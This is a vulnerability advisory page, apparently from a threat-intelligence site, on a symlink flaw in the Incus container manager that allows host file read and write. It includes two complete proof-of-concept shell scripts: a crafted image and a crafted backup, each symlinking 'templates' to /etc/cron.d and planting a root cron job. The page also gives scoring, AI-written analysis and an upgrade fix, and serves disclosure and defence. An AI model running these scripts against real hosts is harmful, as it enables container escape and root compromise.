Incus CVE-2026-48752
CRITICALSeverity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Requires authenticated import privileges (PR:L) over the network API (AV:N), reliable symlink trick (AC:L), and escapes the container/storage context to write host files as root (S:C, C/I/A:H).
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
A specially crafted image or instance backup can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution.
Details
For container images, internal/server/storage/utils.go calls archive.Unpack(imageFile, destPath, ...). The tar extraction path in shared/archive/archive.go excludes device nodes, but it does not reject a top-level templates symlink.
For instance backups, internal/server/storage/drivers/driver_dir_volumes.go:rsync.LocalCopy uses argument -a (archive mode), but does not add --safe-links. This allows a top-level templates symlink.
In practice, this allows a malicious actor to access an arbitrary directory and edit arbitrary files in it.
PoC
Malicious container image
Below, the templates directory is mapped to /etc/cron.d on the host, but it can be mapped anywhere. After that, create a cronjob to run id as root.
#!/bin/sh
set -eu
tmpdir=$(mktemp -d)
cleanup() {
rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP
mkdir -p "${tmpdir}/img/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/templates"
cat<<__EOF__>"${tmpdir}/img/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
description: PoC templates symlink host afrw
__EOF__
cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c * >../afrw-image-templates-symlink.tar
incus image import ../afrw-image-templates-symlink.tar --alias afrw-image-templates-symlink
incus init afrw-image-templates-symlink afrw-image-templates-symlink
incus config template ls afrw-image-templates-symlink
# read
#incus config template show afrw-image-templates-symlink $FILENAME
# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-image-templates-symlink poc-32
#incus config template edit afrw-image-templates-symlink pocMalicious instance backup
Below, the templates directory is mapped to /etc/cron.d on the host, but it can be mapped anywhere. After that, create a cronjob to run id as root.
#!/bin/sh
set -eu
tmpdir=$(mktemp -d)
cleanup() {
rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP
mkdir -p "${tmpdir}/img/backup"
cat<<__EOF__>"${tmpdir}/img/backup/index.yaml"
name: afrw-backup-templates-symlink
backend: dir
pool: default
type: container
optimized: false
__EOF__
mkdir "${tmpdir}/img/backup/container"
cat<<__EOF__>"${tmpdir}/img/backup/container/backup.yaml"
container:
name: afrw-backup-templates-symlink
architecture: x86_64
type: container
status: Stopped
status_code: 102
stateful: false
ephemeral: false
profiles:
- default
config:
volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
expanded_config:
volatile.uuid: 58a0f7de-2490-4e85-9fb2-153ef0fc7be5
volatile.uuid.generation: 24d829e5-d74a-4285-88c0-be369140fb49
devices: {}
expanded_devices:
root:
path: /
pool: default
type: disk
created_at: "2024-01-01T00:00:00Z"
last_used_at: "2024-01-01T00:00:00Z"
volume:
name: afrw-backup-templates-symlink
type: container
content_type: filesystem
config: {}
pool:
name: default
driver: dir
config: {}
__EOF__
cat<<__EOF__>"${tmpdir}/img/backup/container/metadata.yaml"
architecture: x86_64
creation_date: 1
properties:
description: afrw-backup-templates-symlink
__EOF__
mkdir "${tmpdir}/img/backup/container/rootfs"
ln -s /etc/cron.d "${tmpdir}/img/backup/container/templates"
cd "${tmpdir}/img"
tar --owner=0 --group=0 -f- -c backup >../afrw-backup-templates-symlink.tar
incus import ../afrw-backup-templates-symlink.tar afrw-backup-templates-symlink
incus config template ls afrw-backup-templates-symlink
# read
#incus config template show afrw-backup-templates-symlink $FILENAME
# write
printf "* * * * * root sh -c 'id>/pwned'\n" | incus config template create afrw-backup-templates-symlink poc-32
#incus config template edit afrw-templates-symlink pocImpact
Arbitrary file read and write on the host via unsanitized symlink; possibly leading to command execution.
AnalysisAI
Arbitrary host file read and write in Incus (the LXC/LXD container and VM manager) before version 7.2.0 allows a user who can import a crafted container image or instance backup to escape into the host filesystem via an unsanitized top-level templates symlink, possibly escalating to root command execution. The flaw stems from tar/rsync extraction routines that exclude device nodes but fail to reject symlinks pointing outside the target directory. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires the attacker to have authenticated access to an Incus server with permission to import a container image (`incus image import` / `incus init`) or an instance backup (`incus import`), per the CVSS PR:L. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The supplied CVSS 3.1 vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (9.9 Critical) reflects low attack complexity, a scope change (container-to-host), and full CIA impact, which is consistent with the described primitive (arbitrary file read/write as the root-running daemon). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | A tenant or user with permission to import images crafts a tarball containing a top-level `templates` symlink pointing at `/etc/cron.d`, imports it with `incus image import` (or imports a malicious instance backup with `incus import`), then uses `incus config template create` to write a cron job that runs `id` (or any command) as root on the host. Because a full working PoC is published in the advisory, exploitation is low-effort given import access, and the low attack complexity (AC:L) means no special timing or environmental conditions are needed. |
| Remediation | Upgrade to Incus 7.2.0 or later (Vendor-released patch: 7.2.0), per GHSA-vxp5-584q-c479 (https://github.com/lxc/incus/security/advisories/GHSA-vxp5-584q-c479). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Audit all Incus installations (particularly versions before 7.2.0) and identify users/services with image/backup import permissions; immediately restrict imports to fully trusted sources only and consider temporarily disabling import functionality if operationally feasible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-73 – External Control of File Name or Path
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-vxp5-584q-c479